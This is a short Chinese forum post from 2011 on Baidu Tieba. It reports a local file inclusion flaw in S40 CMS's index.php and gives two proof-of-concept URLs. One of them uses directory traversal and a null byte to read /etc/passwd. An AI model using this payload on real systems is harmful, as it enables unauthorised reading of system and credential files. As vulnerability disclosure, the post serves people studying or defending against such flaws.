s40 CMS本地包含漏洞【it一族吧】_百度贴吧

08月14日漏签0天

it一族吧关注：31贴子：148

0回复贴，共1页

<返回it一族吧

s40 CMS本地包含漏洞

只看楼主收藏回复

S40 CMS是一套免费的内容管理系统。漏洞文件index.php
在获取变量之前没有正确地过滤通过require（）的PHP函数。
PoC :
http://www.XXX.com/[cms_path]/?p=[local_file]%00
http://www.XXX.com/[cms_path]/?p=/../../../../../../../etc/passwd%00

送TA礼物

IP属地:湖北

1楼2011-04-11 21:05回复

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频！

贴吧热议榜

0回复贴，共1页

<返回it一族吧

发表回复

发贴请遵守贴吧协议及“七条底线”贴吧投诉

内容:

使用签名档查看全部

发表

保存至快速回贴